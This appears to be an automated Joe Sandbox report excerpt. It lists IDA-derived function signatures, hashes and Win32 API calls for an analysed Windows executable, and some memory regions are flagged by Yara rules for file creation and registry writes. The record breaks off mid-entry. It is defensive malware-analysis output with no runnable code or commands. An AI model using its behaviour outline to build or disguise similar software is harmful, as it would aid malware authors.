                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: BrushClassCreateCursorInfoLoadObjectSolidStock
                                    • String ID: _EL_PicBox
                                    • API String ID: 3644167297-3936694249
                                    • Opcode ID: c427d95e5bc6f178502dac9d31efac785c1c5e1ff50dea262d5f4d8153c26ed7
                                    • Instruction ID: 616189ee233bd0a3689f4a51498e8a71b6b83607c3f617dc0196d5162f876d05
                                    • Opcode Fuzzy Hash: c427d95e5bc6f178502dac9d31efac785c1c5e1ff50dea262d5f4d8153c26ed7
                                    • Instruction Fuzzy Hash: 81416DB1604700ABD364DF69C851FABB7E8EF88714F00491EF59A87380EB74AC41CBA5
                                    APIs
                                      • Part of subcall function 004BDE44: __EH_prolog.LIBCMT ref: 004BDE49
                                    • DestroyAcceleratorTable.USER32(?), ref: 0042702B
                                    • DestroyCursor.USER32(00000000), ref: 00427055
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Destroy$AcceleratorCursorH_prologTable
                                    • String ID: @hB$@hB
                                    • API String ID: 1561936085-1976522915
                                    • Opcode ID: 6140b625b5649b5a7ea72d2413c9b25739ab17b8d3f250e666e67653be35cf67
                                    • Instruction ID: 3166531f0925407aa2ad0d273379069b690d24ae78076b848047b2dcc2f19b53
                                    • Opcode Fuzzy Hash: 6140b625b5649b5a7ea72d2413c9b25739ab17b8d3f250e666e67653be35cf67
                                    • Instruction Fuzzy Hash: 2A31CEB16043269FC320EF19A880A6AF7E4FB45758F910A1EF44593341D739A8098BDA
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorDestroy
                                    • String ID: pTL
                                    • API String ID: 1272848555-168633513
                                    • Opcode ID: babfe00a8da1491cdd2cfa362caae2ae18e2072580169e071fc01aa56d661aeb
                                    • Instruction ID: 67764f4b912f21bf9da09dbb2490c6625230e01f6553a17263520893623b0dc9
                                    • Opcode Fuzzy Hash: babfe00a8da1491cdd2cfa362caae2ae18e2072580169e071fc01aa56d661aeb
                                    • Instruction Fuzzy Hash: F441B1B05047819BC311DF69C89079AFBE4BF59308F844A2FE4DA93741CB7DA509CB6A
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AtomDeleteGlobal$H_prolog
                                    • String ID: WdL
                                    • API String ID: 3979803748-3897115199
                                    • Opcode ID: 3a9463d98e89fd35eb45f00791c5e6d02072597c60907d8dd893c79c6d155b2e
                                    • Instruction ID: 54c4fb6ce3b2f647b721c2c39637e78db9a7c4f998a77e251e3602da8e16813b
                                    • Opcode Fuzzy Hash: 3a9463d98e89fd35eb45f00791c5e6d02072597c60907d8dd893c79c6d155b2e
                                    • Instruction Fuzzy Hash: CD3191345007409FCB64EFA5C885F6ABBE6BF05304F55847EE15A87672CB74AC40CB58
                                    APIs
                                      • Part of subcall function 00438130: GetObjectA.GDI32(?,00000018,?), ref: 0043816D
                                    • GlobalAlloc.KERNEL32(00000002,?), ref: 004385DA
                                    • GlobalFix.KERNEL32(00000000), ref: 004385F5
                                    • GlobalUnWire.KERNEL32(00000000), ref: 0043860E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Global$AllocObjectWire
                                    • String ID: pTL
                                    • API String ID: 3598329280-168633513
                                    • Opcode ID: e25e6ec8c257063cf141bead1986bb9353d6d23a22f3d3162811c0920ae9f041
                                    • Instruction ID: e53177e41bc3011753283d4da60d7bab684a84c33e2cb3c5651efdfe1bb34c1f
                                    • Opcode Fuzzy Hash: e25e6ec8c257063cf141bead1986bb9353d6d23a22f3d3162811c0920ae9f041
                                    • Instruction Fuzzy Hash: 0931B0716083418FC304EF18C885B6FFBE4FB98754F44092EF48583341DB789908CAA6
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C6176
                                      • Part of subcall function 004C6652: __EH_prolog.LIBCMT ref: 004C6657
                                    • GetCurrentThread.KERNEL32 ref: 004C61C4
                                    • GetCurrentThreadId.KERNEL32 ref: 004C61CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CurrentH_prologThread
                                    • String ID: WdL
                                    • API String ID: 2095891121-3897115199
                                    • Opcode ID: 8e7e32220b13be093acf2f9fed99cfb1e46b79e39eff79d5f8de67757a1be42d
                                    • Instruction ID: 49426ac542c4221a05dc5736a777e9bf4a50a7504f1963df87fc0d2a1c5dda3d
                                    • Opcode Fuzzy Hash: 8e7e32220b13be093acf2f9fed99cfb1e46b79e39eff79d5f8de67757a1be42d
                                    • Instruction Fuzzy Hash: E321B3B4900B009ED7609F2AC441B9BFBE8FFA5300F14892FE5AA87621DBB464418F55
                                    APIs
                                    • FindResourceA.KERNEL32(?,#oC,000000F0), ref: 004BFF91
                                    • LoadResource.KERNEL32(?,00000000,?,?,?,004BD832,?,?,00436F23), ref: 004BFF9D
                                    • LockResource.KERNEL32(00000000,?,?,?,004BD832,?,?,00436F23), ref: 004BFFAC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLock
                                    • String ID: #oC
                                    • API String ID: 2752051264-3371845353
                                    • Opcode ID: 175f7f293f2380efb18d96dcad449a18374befda3594840448db0d7711eccd02
                                    • Instruction ID: 5c8d83825f2e3f1cffc33cc714e43ca2690c013302b288becec12528aec015d9
                                    • Opcode Fuzzy Hash: 175f7f293f2380efb18d96dcad449a18374befda3594840448db0d7711eccd02
                                    • Instruction Fuzzy Hash: 6AE0ED336001116B87512B665C48CBFF6AEEFC2361B25083BF505C2112DB288C0A8239
                                    APIs
                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 004C3982
                                    • GetClassNameA.USER32(00000000,?,0000000A), ref: 004C399D
                                    • lstrcmpiA.KERNEL32(?,combobox), ref: 004C39AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClassLongNameWindowlstrcmpi
                                    • String ID: combobox
                                    • API String ID: 2054663530-2240613097
                                    • Opcode ID: 25e60858ad3ff6137c50043dbef25ed2088f91e111dabcdca2c773af42314691
                                    • Instruction ID: 92243521f27f2f8a63e8bc5b3554df48d5bf3684fa241a60b75a6f30e810fb03
                                    • Opcode Fuzzy Hash: 25e60858ad3ff6137c50043dbef25ed2088f91e111dabcdca2c773af42314691
                                    • Instruction Fuzzy Hash: 6DE06575954209BBCF519F70CC4DFAE3B78BB1130AF108235B41BD51A0D674E645C659
                                    APIs
                                    • lstrlen.KERNEL32(024241FE), ref: 0242C2A2
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • GlobalAlloc.KERNEL32(00000040,00010000), ref: 0242C2E7
                                    • lstrlen.KERNEL32(024A3F70,?), ref: 0242C32F
                                    • lstrlen.KERNEL32(?), ref: 0242C44F
                                      • Part of subcall function 02424521: CreateFileA.KERNEL32(024A4034,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0242454A
                                    • GlobalFree.KERNEL32(00000000), ref: 0242C591
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Globaltolower$AllocCreateFileFree
                                    • String ID:
                                    • API String ID: 2905081297-0
                                    • Opcode ID: 091eddc7a93f723c1a3b13bba9122db08df93b9bd43292fec8f5b6239c600ec7
                                    • Instruction ID: f5fb207c7685fa556c33cdc3a2c5a47809fb49f780455bb08763ec92c4447843
                                    • Opcode Fuzzy Hash: 091eddc7a93f723c1a3b13bba9122db08df93b9bd43292fec8f5b6239c600ec7
                                    • Instruction Fuzzy Hash: 8F9160B1D002289BCB25CF96DDC4BAEB7B9AB48344F4045DEE50DA7280D775AB89CF50
                                    APIs
                                    • SendMessageA.USER32(?,00000140,00000000,00000000), ref: 0042132C
                                    • SendMessageA.USER32(?,00000140,00000000,00000000), ref: 0042139E
                                    • SendMessageA.USER32(?,00000140,00000000,00000000), ref: 0042142F
                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004215E9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 42bc2efb214247feded8345b0ef7d2e2a3d9f18077e355108be0ae65c2b6f26c
                                    • Instruction ID: 12e165aa0ac9fa7eb15abe8dca2e0c0d979e901baef12aca439eaf28c1ee53a8
                                    • Opcode Fuzzy Hash: 42bc2efb214247feded8345b0ef7d2e2a3d9f18077e355108be0ae65c2b6f26c
                                    • Instruction Fuzzy Hash: 0BE19F36644740CFD324DF29D881B9AF3E0FBD4B14F508A2EE95A87780DB79A806CB55
                                    APIs
                                    • midiStreamOpen.WINMM(005DF0F8,005DF120,00000001,0043DD40,005DF0DC,00030000,00000000,005DF0DC,?,00000000), ref: 0043D74B
                                    • midiStreamProperty.WINMM ref: 0043D832
                                    • midiOutPrepareHeader.WINMM(00000000,00000000,00000040,00000001,00000000,00000000,005DF0DC,?,00000000), ref: 0043D980
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: midi$Stream$HeaderOpenPrepareProperty
                                    • String ID:
                                    • API String ID: 2061886437-0
                                    • Opcode ID: 0eab71a0c04eee356c35be4d994fa099b862ef0320cebc22ee72d446a9432412
                                    • Instruction ID: bc2f2eeaf38f8ecc6af8e8ecbfcad736b37259d6281b0283c1fb544c54e62d07
                                    • Opcode Fuzzy Hash: 0eab71a0c04eee356c35be4d994fa099b862ef0320cebc22ee72d446a9432412
                                    • Instruction Fuzzy Hash: 88A17CB16006058FD724DF29D890BAAB7F6FB88304F10492EE69AC7750EB35F919CB44
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0043B842
                                    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0043B89A
                                    • __ftol.LIBCMT ref: 0043B985
                                    • __ftol.LIBCMT ref: 0043B992
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,00000000), ref: 004C279A
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,?), ref: 004C27B0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ObjectSelect__ftol$ClientRect
                                    • String ID:
                                    • API String ID: 2514210182-0
                                    • Opcode ID: adfb4278508219dc0635fe45012f1b615c957978564ab572a8ca7a57fb398609
                                    • Instruction ID: fa6ce507f3acf39501fd14e264ec979dc582a4a44c500ea9b15a0f3bfe5d4f4a
                                    • Opcode Fuzzy Hash: adfb4278508219dc0635fe45012f1b615c957978564ab572a8ca7a57fb398609
                                    • Instruction Fuzzy Hash: 3651AEB1A083029FC714DF29C980A6BBBE9FFC8700F144A2EFA8593251D734DD458B96
                                    APIs
                                    • IsWindow.USER32(?), ref: 00428E74
                                    • GetParent.USER32(?), ref: 00428EC4
                                    • IsWindow.USER32(?), ref: 00428EE4
                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 00428F5F
                                      • Part of subcall function 004C088A: ShowWindow.USER32(?,?,004164AE,?), ref: 004C0898
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$ParentShow
                                    • String ID:
                                    • API String ID: 2052805569-0
                                    • Opcode ID: c54be7c32785ae336d0c7dade66ae470ac4b6afde1bec856540e56fb02ebd9e3
                                    • Instruction ID: 867a575e8e47ab6a5953092b555829ba90373fc98400e5e31bd8bde6f756f48c
                                    • Opcode Fuzzy Hash: c54be7c32785ae336d0c7dade66ae470ac4b6afde1bec856540e56fb02ebd9e3
                                    • Instruction Fuzzy Hash: 6E41C071700321ABD320DE61AD81FAFB3A5AF94754F45052EFD049B381DB78EC058BA9
                                    APIs
                                      • Part of subcall function 004C08B1: IsWindowEnabled.USER32(?), ref: 004C08BB
                                    • IsWindowVisible.USER32(?), ref: 004154AA
                                      • Part of subcall function 004BE881: GetWindowTextLengthA.USER32(00000000), ref: 004BE88E
                                      • Part of subcall function 004BE881: GetWindowTextA.USER32(00000000,00000000,00000000), ref: 004BE8A6
                                      • Part of subcall function 004BADE4: SendMessageA.USER32(?,00000466,00000000,00000000), ref: 004BADF0
                                    • wsprintfA.USER32 ref: 00415544
                                    • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00415570
                                    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0041557F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$Text$EnabledLengthVisiblewsprintf
                                    • String ID:
                                    • API String ID: 1914814478-0
                                    • Opcode ID: ed467b0b66946e223aa2d83e77d057760392189b1f699b937d45d7301b9172a3
                                    • Instruction ID: 3d4ecce6f621954bd8e34688a95f336f01eb48dab4e75cfe0bc6d42d1a0fba7e
                                    • Opcode Fuzzy Hash: ed467b0b66946e223aa2d83e77d057760392189b1f699b937d45d7301b9172a3
                                    • Instruction Fuzzy Hash: 72515575608700AFD364DF14CA91B9BB7E6BBC8704F50891EE59A87780CB78E801CB96
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c34212991f3f07fd964cca6ef81fb3bfe288dabc868c2992361fa84f07c8d0cb
                                    • Instruction ID: 44fda1a0bf6e262af31edde728aab9fbe610db2a1ee7d87060d1a5f09082f0a0
                                    • Opcode Fuzzy Hash: c34212991f3f07fd964cca6ef81fb3bfe288dabc868c2992361fa84f07c8d0cb
                                    • Instruction Fuzzy Hash: 6231A0727142019FD320DF69E881FAB73E5EB84704F008C2EF542CB281E779E8428BA5
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 0043947F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: DeleteObject
                                    • String ID:
                                    • API String ID: 1531683806-0
                                    • Opcode ID: ffa0341f0c7dc17d7bd65c0cdbc3a55fc417f94c9186baeb196416ddc2c2a0dd
                                    • Instruction ID: 551314a32d8c929f1119e63163136c479e62120c22fd6cd44f42ad7d58543b64
                                    • Opcode Fuzzy Hash: ffa0341f0c7dc17d7bd65c0cdbc3a55fc417f94c9186baeb196416ddc2c2a0dd
                                    • Instruction Fuzzy Hash: C43170762047419FC314DF69D984F6BB7E8FB88724F008A2EF55983291DB78E805CB65
                                    APIs
                                    • wsprintfA.USER32 ref: 02421DB5
                                    • lstrcpy.KERNEL32(?,00000000), ref: 02421E49
                                    • lstrcpy.KERNEL32(?,00000000), ref: 02421E6B
                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 02421E95
                                    • lstrlen.KERNEL32(?), ref: 02421EA4
                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 02421EC4
                                    • RegCloseKey.ADVAPI32(?), ref: 02421ED6
                                    • GlobalFree.KERNEL32(00000000), ref: 02421F4B
                                    • wsprintfA.USER32 ref: 02421F9F
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 02421FDB
                                    • RegCloseKey.ADVAPI32(?), ref: 02422284
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value$Closelstrcpywsprintf$FreeGlobalQuerylstrlen
                                    • String ID:
                                    • API String ID: 3359840872-0
                                    • Opcode ID: 452ffa6505b4b23851c2d00bfb45fa7ed92c78c70f77453fcff555a3f8cf9b03
                                    • Instruction ID: 51a3369d7a241a9992ab8206d79ddc18b97102a17d5ff7925d7433728ae1d992
                                    • Opcode Fuzzy Hash: 452ffa6505b4b23851c2d00bfb45fa7ed92c78c70f77453fcff555a3f8cf9b03
                                    • Instruction Fuzzy Hash: 5B413F75D04628DFDB24CF11CC84AEAB774BB98302F4446CAE50F6A285E7B15AC9CF51
                                    APIs
                                    • GetMessagePos.USER32 ref: 004246F8
                                    • ScreenToClient.USER32(?,?), ref: 0042471A
                                    • ChildWindowFromPointEx.USER32(?,?,?,00000005), ref: 00424730
                                    • GetFocus.USER32 ref: 0042473B
                                      • Part of subcall function 004C08F3: SetFocus.USER32(?,00415589), ref: 004C08FD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Focus$ChildClientFromMessagePointScreenWindow
                                    • String ID:
                                    • API String ID: 3117237277-0
                                    • Opcode ID: 99c277dedfeebed3fd86103635802da44b98bdce5a22c64355e2eff626e63002
                                    • Instruction ID: ee447ea767fe5f6216572504ee03ee72a4982fbcbcc5422467ee888aa4061a2b
                                    • Opcode Fuzzy Hash: 99c277dedfeebed3fd86103635802da44b98bdce5a22c64355e2eff626e63002
                                    • Instruction Fuzzy Hash: E221A731700611ABD624EB24DC81F6FB3A5EFC1308F14852EF9558B281DB38E8168BA9
                                    APIs
                                    • StartPage.GDI32(?), ref: 00425375
                                    • EndPage.GDI32(?), ref: 0042539B
                                      • Part of subcall function 00433540: wsprintfA.USER32 ref: 0043354F
                                      • Part of subcall function 004C07B8: SetWindowTextA.USER32(?,?), ref: 004C07C6
                                    • UpdateWindow.USER32(?), ref: 004253EA
                                    • EndPage.GDI32(?), ref: 00425402
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Page$Window$StartTextUpdatewsprintf
                                    • String ID:
                                    • API String ID: 104827578-0
                                    • Opcode ID: 4af6d2610878254fcb9aacf580f9fdba793bf89d57895c7cc2ade0a511c32b56
                                    • Instruction ID: 17f6c7cbebb2f02d042c05a39c337fafc198f2229917925139d94f1e716f55f0
                                    • Opcode Fuzzy Hash: 4af6d2610878254fcb9aacf580f9fdba793bf89d57895c7cc2ade0a511c32b56
                                    • Instruction Fuzzy Hash: 1B214F71701F109BC264EB3AEC84B9BB7E8EFC4705F90482EE59FC7210E674A4468B58
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Parent$RectWindow
                                    • String ID:
                                    • API String ID: 2276825053-0
                                    • Opcode ID: e866cf4124e4a183c870b4a490bf8c08352d03a34987f18f515f4c66364cf337
                                    • Instruction ID: 52e91e8382f88d9713da7f41cad524f0fc2fe541d71ca2a05776442307ef9b71
                                    • Opcode Fuzzy Hash: e866cf4124e4a183c870b4a490bf8c08352d03a34987f18f515f4c66364cf337
                                    • Instruction Fuzzy Hash: A7115CB5600705ABD724DF69D884EABB7ADEF84244F00492EB84587305EA78EC45C6B4
                                    APIs
                                    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00413B9D
                                    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00413BB6
                                    • GetStockObject.GDI32(00000011), ref: 00413BC1
                                    • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 00413BD4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$ObjectStock
                                    • String ID:
                                    • API String ID: 1309931672-0
                                    • Opcode ID: 58e035aa8d59b32cbd2a9e94defa4d7959ef378b32b15ef776c77956cf3c04a8
                                    • Instruction ID: 8d18389c94d41da159703fa336ab8a607e60b42911a6e7a0ecb826ba7fd3e7bd
                                    • Opcode Fuzzy Hash: 58e035aa8d59b32cbd2a9e94defa4d7959ef378b32b15ef776c77956cf3c04a8
                                    • Instruction Fuzzy Hash: 27118E72304210ABC654DF59EC40F9B73A9EF88752F04846AF6048B281DB74ED46C7A5
                                    APIs
                                    • GetTopWindow.USER32(?), ref: 004273BD
                                      • Part of subcall function 004271F0: IsChild.USER32(?,?), ref: 0042726D
                                      • Part of subcall function 004271F0: GetParent.USER32(?), ref: 00427287
                                    • SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 00427416
                                    • SendMessageA.USER32(00000000,000000F1,00000000,00000000), ref: 00427426
                                    • GetWindow.USER32(00000000,00000002), ref: 0042742B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$ChildParent
                                    • String ID:
                                    • API String ID: 1043810220-0
                                    • Opcode ID: 4fbc66927b68ffe35fdea525dc36c9708539294a11600888c5a77ecb7b83cfa5
                                    • Instruction ID: 7f7f93460a9e2ddd5ff19fc7a1770d69f31ee88421afc86ec8c72399d371ea53
                                    • Opcode Fuzzy Hash: 4fbc66927b68ffe35fdea525dc36c9708539294a11600888c5a77ecb7b83cfa5
                                    • Instruction Fuzzy Hash: 9401753178573276E2316629AC46F6F764C9F55B50F944126BB00EB2D0DE94EC0181BD
                                    APIs
                                    • GetParent.USER32(?), ref: 0044C88B
                                    • SendMessageA.USER32(?,000083EB,?,00000000), ref: 0044C8B5
                                    • SendMessageA.USER32(?,000083EC,?,00000000), ref: 0044C8C9
                                    • SendMessageA.USER32(?,000083E9,?,00000000), ref: 0044C8EC
                                      • Part of subcall function 004C07DF: GetDlgCtrlID.USER32(?), ref: 004C07E9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent
                                    • String ID:
                                    • API String ID: 1383977212-0
                                    • Opcode ID: a1ab69eb120a8abbd1b8f1b8b0519f7a7cfeecc43f73fc990d88752513831c41
                                    • Instruction ID: 00bba7c99bbac2a6d83cd8c6a559a80e5d0f5ef373931b859708fea065ed9b2f
                                    • Opcode Fuzzy Hash: a1ab69eb120a8abbd1b8f1b8b0519f7a7cfeecc43f73fc990d88752513831c41
                                    • Instruction Fuzzy Hash: 350184B6601B14BBE254B6698CC1D2FB76DABC4B49B04451EF500D7781DE68FC024768
                                    APIs
                                    • RtlReAllocateHeap.NTDLL(00000000,00000050,?,00000000), ref: 004B3602
                                    • RtlAllocateHeap.NTDLL(00000008,000041C4), ref: 004B3636
                                    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004B33A2,?,?,?,004ABA13,?,?,?), ref: 004B3650
                                    • HeapFree.KERNEL32(00000000,?,?,00000000,004B33A2,?,?,?,004ABA13,?,?,?,?,?,?), ref: 004B3667
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Heap$Allocate$AllocFreeVirtual
                                    • String ID:
                                    • API String ID: 94566200-0
                                    • Opcode ID: 8f3b93d3f8a5fef697591f1255293322349fd4427190a065af5e2b85deceded2
                                    • Instruction ID: 9f4a1679a6b2bf57918a65b3fd457ce8e5f5c3f5eb8e9cb4fbd4963eb8f28dfb
                                    • Opcode Fuzzy Hash: 8f3b93d3f8a5fef697591f1255293322349fd4427190a065af5e2b85deceded2
                                    • Instruction Fuzzy Hash: 57112870600201AFC7B08F1AEC85DA27BB7FB89725B18952BF256C72B1CB719945DF14
                                    APIs
                                    • GetTopWindow.USER32(?), ref: 004BF5A7
                                    • SendMessageA.USER32(00000000,?,?,?), ref: 004BF5DD
                                    • GetTopWindow.USER32(00000000), ref: 004BF5EA
                                    • GetWindow.USER32(00000000,00000002), ref: 004BF608
                                    Memory Dump Source
